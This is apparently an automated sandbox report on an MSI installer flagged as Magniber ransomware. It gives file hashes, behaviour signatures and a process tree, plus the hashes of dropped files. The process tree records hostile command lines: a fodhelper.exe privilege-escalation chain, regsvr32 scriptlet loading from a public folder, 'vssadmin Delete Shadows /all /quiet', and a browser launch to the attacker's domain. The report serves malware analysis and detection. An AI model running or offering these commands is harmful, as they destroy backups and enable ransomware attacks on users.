Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20230621-en -
resource tags
-
submitted
05-07-2023 18:44
General
-
Target
fffba37840957480e176802e89638fb53add9b39349241f8de52719f57a01d55.msi
-
Size
1.1MB
-
MD5
250a23219a576180547734430d71b0e6
-
SHA1
a5bcdb824d325d44c5e0feb5bf9389da520e6f82
-
SHA256
fffba37840957480e176802e89638fb53add9b39349241f8de52719f57a01d55
-
SHA512
e0c26cceff37d9328dddc9989ff75070b51a3ccd35c93e82fdcda3a828a90ac53d8604524f5195cc9d4865aa8680ccfd79f6d85710b46496ab9efea321c13417
-
SSDEEP
1536:j66iqjTbG3VvotZmMi0W7Ap0Ds0Dm78x:jAGelvoW0dQx
Malware Config
Signatures
-
Detect magniber ransomware 2 IoCs
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (66) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Modifies extensions of user files 13 IoCs
Ransomware generally changes the extension on encrypted files.
-
Loads dropped DLL 1 IoCs
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Program Files directory 2 IoCs
-
Drops file in Windows directory 9 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Modifies registry class 15 IoCs
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\fffba37840957480e176802e89638fb53add9b39349241f8de52719f57a01d55.msi1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/t2o7g3z2⤵
- Modifies registry class
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/vovcg35674⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/vovcg35674⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/t2o7g3z2⤵
- Modifies registry class
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/vovcg35674⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/vovcg35674⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
-
-
-
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/t2o7g3z2⤵
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/vovcg35674⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/vovcg35674⤵
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
-
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 863DC7DF85CFB8945D71C0A422DD257B2⤵
- Modifies extensions of user files
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.execmd /c "start microsoft-edge:http://8e1c6c9894402eb0d494yuyevbg.diedsad.info/yuyevbg^&2^&46447212^&66^&373^&22190413⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://8e1c6c9894402eb0d494yuyevbg.diedsad.info/yuyevbg&2&46447212&66&373&22190414⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0x44,0x104,0x7ff8502746f8,0x7ff850274708,0x7ff8502747185⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,7617192955098956830,3514498919040768043,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:25⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,7617192955098956830,3514498919040768043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,7617192955098956830,3514498919040768043,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:85⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,7617192955098956830,3514498919040768043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,7617192955098956830,3514498919040768043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,7617192955098956830,3514498919040768043,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,7617192955098956830,3514498919040768043,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3932 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,7617192955098956830,3514498919040768043,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,7617192955098956830,3514498919040768043,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4268 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,7617192955098956830,3514498919040768043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 /prefetch:85⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings5⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x204,0x228,0x120,0x22c,0x7ff679575460,0x7ff679575470,0x7ff6795754806⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,7617192955098956830,3514498919040768043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,7617192955098956830,3514498919040768043,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3924 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,7617192955098956830,3514498919040768043,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4076 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,7617192955098956830,3514498919040768043,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,7617192955098956830,3514498919040768043,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:15⤵
-
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
- Modifies registry class
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD5347e5d30697c7376789af3fc4fbab543
SHA18943c8635d1897fc7fecacfe6d77d83dfc9ce413
SHA256091b417bcc72baec61f9a58e210631827157d3bc17bf0ade97275754c520adc0
SHA5121215a2c93f177679496bcbde3d1c47af13899c8dd7937d9eca30b0b3739bc1ea11986caa62eb2b4a70455af717efb2fe7968075d821e1665c9189ff91a534769
-
Filesize
152B
MD55577898093952163e585fc1356275cf9
SHA1d46e9241b7e8e0b97598907a260c3c6ad7229b6a
SHA256275315a835f78d1d40d3425488d1ed277924ddf5200cfc9635bf24afdf083cf5
SHA51200a66c6a214f0a35144217c7738a237e41e7b9b5f66ecf9a94baf487e2b90533070092eb6930247532a7907f5415cc842d51758d3a76a48568f476ef30f1cb01
-
Filesize
152B
MD5b092647394f1376f80bf2d4e8797d7b5
SHA11809389720e213a4733352f838cd1f16bd20d3db
SHA256fa55709e752681e7d9f38d74a3376c06d31bd333fbf94f7aca17468f9d8fc85b
SHA5129d70333ced82fa5ffcff47d6a25b3051916e8f5a069450dd86676315a15a94fd131a0d7973f19562e4807589249213dbf64ac374cd688e1ea17dd190f8e3761e
-
Filesize
70KB
MD5e5e3377341056643b0494b6842c0b544
SHA1d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA51283f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef
-
Filesize
2KB
MD53de9a5fd0ec3bc0b83af6bf238846cd5
SHA16713168b7d5e0081bda4fb13675c90aade2d15d1
SHA2560872b94803e9dac6ee71efe54d5b91bd56fa253fa8fb35be7964e5aab13b6978
SHA512f47a7da943e0bafd3dcac159aa5c0c8101aef5a8769739fa6e048fcd9b0ecb90a14e4419fdc1d6d693b7e1c2aebcc6e53bf55e6e30f92d37a1a1c722087720e5
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
4KB
MD5b450f92757a702a50060269d8d6f4875
SHA164ed29061715381718ab16df481c82815a5ec82c
SHA2560a583307b70c61929dd8023f1064fac9e158cb98c91fc4671b389b5d9b4e761d
SHA512aa51040af56cb4504c91f05052aaf3aa9c9f97f826ce26b7a2e7db7269e243dce80fd92e596c69e4ee539024601409bdd4ddaa5c5a4b69e9243711f71c6ce79e
-
Filesize
5KB
MD57fd65c274c993e3b66550fe166fa28e9
SHA1dc37c8f7c049f1f54fa3381ba8816bd46ac9c73e
SHA256033d5601d796d059979ef2b0b5daef8416c45c1d61bd427585a31966bf890130
SHA5126a70bc57de3a0750ce7a7f0f3c9817a097cc7218243b2260925d1dda6decce74255e361db064942c5e6febec9a715595a1a80041ee5534a8082ec57f2ca45308
-
Filesize
5KB
MD5c7a4307148f35f0faedafed67b8e868c
SHA123a9f444645e25eff9ce914d207afd103156853e
SHA256f964646fc9a7dd90cf2280b572be0d143c9257860ad8045d9ddf9190a3122a6e
SHA5124efe339eb7d4e7e66d9500b49351a02f890d989d26c56453f01645b26caefcde369a6766890e25048f33b77a18295582a9536b9922b16e0f6d5a89de9db17b01
-
Filesize
24KB
MD5aefc5ee3f7d446e4f589d384871089fa
SHA1f473772b9fad6deed5ac5ab67e21e80a32beea15
SHA256cafbd5930c58521f476407f52bc923d7ad33b37e5dbff9be9b1d6b28249d0ad8
SHA512697ff96fe24ee7016dcfead1ed557b89f2123306749939ac0bf8bc09eae97fbb040314d59991482dad192006a278343cd1176cecdd79a0cb98138611e81bb02f
-
Filesize
24KB
MD5bfb396f724d87b5dc03bf360219fa3b0
SHA15c110515ef78880ca230a1d418b6ee92a3565e4d
SHA2564a0f5896f8b14c1d99f37e76192d6d84c433000d50a7b5ec831d1ebecfbf2264
SHA5128bdc70b2413a4e8ddc1b72fe4628106f76e7a5246c113575aca817ff6dce051f945016eac9e8bf342716c1a0862a737c015cc933c13e44a013555ddfff6f527f
-
Filesize
41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
10KB
MD5fad401bb09e337187fbe375f4cf9b79c
SHA11e8ba58e4feade1abe5971a5e744faae93085e18
SHA256c3ff58554aaf9118f2b615dab3e193a58b5f1c9929b247c17a147080b60bd3a9
SHA5129a5747857ece2c2aafacc5b57be2b29dee1414e3dc5f7d5e07a19bd7f7603ead0500245c0c33eaa5b28aadfdec0e809d825816cd9aea5764e2b2177e1f0d998e
-
Filesize
13KB
MD57741ec5f76e879f472b132f708ae0b2e
SHA1321d2ee4af7ed27942d35c737278b2b14e402de1
SHA256bc369ccd1ef3b64aa33defb75b95633b304a5fd17f3ef51c0edfb4b74b6f3368
SHA5122e891f28bdfe311b8b6cb15771fad5eae78273c48a05e71b8aaecd11aeaa19e86e3dd8bd0352b9935651b1387a74f886fbdad014051247c8668c0e22f149ed35
-
Filesize
3KB
MD5a07cdf9a11846c60ca7557cdc586917b
SHA10236514cc024560ace2b052c069539ac2a598c76
SHA2565153f9ef280c9430309bf7d33e756f4ab1823668d753e8ad9077dc322d857444
SHA51270eeb01b31853084503d0429c1a287ab6c41071f3c278b3850dea378f54d9d4cf351578471527c1d8567b0983ce4b1a7d636bf6f8580fbeda568cc2f07dfd2f2
-
Filesize
14KB
MD58be2560b0114265a94bd2fa4df9c91c8
SHA126f0b7eeb1727c77bfb2cd600ac59f5ff6f8668c
SHA25699dc3441b18429cad047582341b1154d0daa1920e02719ea8042d7cee91dec15
SHA512053f6931b9a93f6a957f0cf31a026fd177360e26b152f1bc488d417d53e01e51e092101d2ac66858f0773fafa46895a78fad5d35009a41c36bc010feb2ad0a6b
-
Filesize
3KB
MD53b2709348d47be54247950b967278fe6
SHA1c3cdf2ae717e4b484c6ce1e348de2767b3039754
SHA256f7926f6fcc99e95fdf63ce5c1b88e22ef5771f37f17fca8ceeab5dd3d8018780
SHA51246563986cfd0bc11b679eb38308edc1a412288ddf697660e2d08b642772a16d08a449bc83455cda51ba148afd513188296b543a7048940fe9134501b2932d73f
-
Filesize
3KB
MD53b2709348d47be54247950b967278fe6
SHA1c3cdf2ae717e4b484c6ce1e348de2767b3039754
SHA256f7926f6fcc99e95fdf63ce5c1b88e22ef5771f37f17fca8ceeab5dd3d8018780
SHA51246563986cfd0bc11b679eb38308edc1a412288ddf697660e2d08b642772a16d08a449bc83455cda51ba148afd513188296b543a7048940fe9134501b2932d73f
-
Filesize
3KB
MD53b2709348d47be54247950b967278fe6
SHA1c3cdf2ae717e4b484c6ce1e348de2767b3039754
SHA256f7926f6fcc99e95fdf63ce5c1b88e22ef5771f37f17fca8ceeab5dd3d8018780
SHA51246563986cfd0bc11b679eb38308edc1a412288ddf697660e2d08b642772a16d08a449bc83455cda51ba148afd513188296b543a7048940fe9134501b2932d73f
-
Filesize
1KB
MD5aa5892597800fa52ce0be1106d4cac4d
SHA1fdaa8761529c32b68b5714b31b530c22ddb7b2b2
SHA25682348f02222a47f5aa173864bdce1ead6ac1319e9cfd43c41bc5981426597693
SHA51267b4c30e05527d4dc3d72391b4b96d1471d5a54e6f2a60bf034867df6b23df1cce0aecf4b1b92f8203ed8ebdc33036fc25ed2e2529a05dae88e948a3e01c5824
-
Filesize
1KB
MD5aa5892597800fa52ce0be1106d4cac4d
SHA1fdaa8761529c32b68b5714b31b530c22ddb7b2b2
SHA25682348f02222a47f5aa173864bdce1ead6ac1319e9cfd43c41bc5981426597693
SHA51267b4c30e05527d4dc3d72391b4b96d1471d5a54e6f2a60bf034867df6b23df1cce0aecf4b1b92f8203ed8ebdc33036fc25ed2e2529a05dae88e948a3e01c5824
-
Filesize
1KB
MD5aa5892597800fa52ce0be1106d4cac4d
SHA1fdaa8761529c32b68b5714b31b530c22ddb7b2b2
SHA25682348f02222a47f5aa173864bdce1ead6ac1319e9cfd43c41bc5981426597693
SHA51267b4c30e05527d4dc3d72391b4b96d1471d5a54e6f2a60bf034867df6b23df1cce0aecf4b1b92f8203ed8ebdc33036fc25ed2e2529a05dae88e948a3e01c5824
-
Filesize
1.1MB
MD513e790d06a0eb1e0135f5d3e2cd0ba02
SHA17fba1f17c598679c0676d04db5c891b2f04003a2
SHA2569f2dbba04b9b3cdb7a90b691d74372f7314421986a33ef0340d7a3451474c0dd
SHA512212c6abc51cd8ad262f1a88f41e9f961f19affd610c757a0c522a65412fef26d5cb826dc83518cd9aede768270a5901de2bd7e588c7b4ce4980b15b2394cd417
-
Filesize
1.1MB
MD513e790d06a0eb1e0135f5d3e2cd0ba02
SHA17fba1f17c598679c0676d04db5c891b2f04003a2
SHA2569f2dbba04b9b3cdb7a90b691d74372f7314421986a33ef0340d7a3451474c0dd
SHA512212c6abc51cd8ad262f1a88f41e9f961f19affd610c757a0c522a65412fef26d5cb826dc83518cd9aede768270a5901de2bd7e588c7b4ce4980b15b2394cd417
-
Filesize
1.1MB
MD5250a23219a576180547734430d71b0e6
SHA1a5bcdb824d325d44c5e0feb5bf9389da520e6f82
SHA256fffba37840957480e176802e89638fb53add9b39349241f8de52719f57a01d55
SHA512e0c26cceff37d9328dddc9989ff75070b51a3ccd35c93e82fdcda3a828a90ac53d8604524f5195cc9d4865aa8680ccfd79f6d85710b46496ab9efea321c13417
-
Filesize
23.0MB
MD5548fe75c289f556101ff8c94a00dcc80
SHA1bfcf671682fe66d5798cf6b20091980bde4d92cf
SHA2563baa6e1ab05c10ad7d1943aa18b368f5385da6ba7bafdae2d33771b6486ffa57
SHA5124de7a4cdf95063f6781a03121f5ce24f785b223e5428fe87713d12a3698b5b78f47a576d9cce9446114876894435345379c2353fc2fc05be5a2703ac9d3715a7
-
Filesize
5KB
MD5b518a99493be3738597b302bcbd8b318
SHA16fdca4442959d8ab018b05359eece75f8e768f64
SHA2562f340f56e6ba8990e39f973e02bce1f9de60debf022d08c92e779a5634295939
SHA51254a0bcb8ed3bba7cdfb76849723a8ce7d04d4da8fa0732db2fc2caf06f955e8b5a64015f2e0db4b24fb0c6bc011d3ff2fdd3b11a05f6b976ed212a71f4e3f1d6
-
Filesize
4KB
-
Filesize
12KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.1MB